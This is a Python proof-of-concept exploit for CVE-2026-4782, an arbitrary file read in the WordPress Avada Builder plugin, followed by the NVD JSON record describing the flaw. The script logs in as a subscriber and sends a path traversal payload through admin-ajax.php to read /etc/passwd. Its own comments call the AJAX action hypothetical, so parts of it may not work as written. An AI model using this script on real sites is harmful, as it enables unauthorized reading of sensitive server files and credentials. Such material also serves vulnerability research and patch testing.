CVE-2026-4782

import requests # Exploit Title: WordPress Avada Builder < 3.15.3 - Arbitrary File Read (Subscriber) # Description: Reads /etc/passwd using the vulnerable shortcode parameter. target_url = "http://target-site.com" login_url = f"{target_url}/wp-login.php" # Attacker credentials (Subscriber level) username = "attacker" password = "password" session = requests.Session() # Step 1: Authenticate as a subscriber login_data = { "log": username, "pwd": password, "redirect_to": f"{target_url}/wp-admin/", "wp-submit": "Log In" } session.post(login_url, data=login_data) # Step 2: Send payload exploiting the shortcode # Note: The exact endpoint to trigger the shortcode might vary (e.g., via AJAX or preview). # This simulates sending a request that triggers the 'fusion_section_separator' rendering. # The vulnerability is in 'fusion_get_svg_from_file' called by the shortcode. vulnerable_file = "../../../../../../../etc/passwd" # Example payload structure based on the function 'fusion_section_separator' # Assuming an AJAX endpoint that renders shortcodes or accepts the parameter directly ajax_url = f"{target_url}/wp-admin/admin-ajax.php" payload_data = { "action": "fusion_builder_render", # Hypothetical action for demonstration "shortcode": f"[fusion_section_separator custom_svg='{vulnerable_file}']", # Or direct parameter depending on implementation "custom_svg": vulnerable_file } response = session.post(ajax_url, data=payload_data) if "root:" in response.text: print(f"[+] Exploit successful! File content:\n{response.text}") else: print("[-] Exploit failed or target not vulnerable.")

{"cve": {"id": "CVE-2026-4782", "sourceIdentifier": "[email protected]", "published": "2026-05-13T13:01:55.633", "lastModified": "2026-05-13T14:43:46.717", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Avada Builder plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 3.15.2 via the 'fusion_get_svg_from_file' function with the 'custom_svg' parameter of the 'fusion_section_separator' shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. The vulnerability was partially patched in version 3.15.2 and fully patched in version 3.15.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-36"}]}], "references": [{"url": "https://themeforest.net/item/avada-responsive-multipurpose-theme/2833226", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/86346be9-7ca6-49b7-83b2-01a335d48c94?source=cve", "source": "[email protected]"}]}}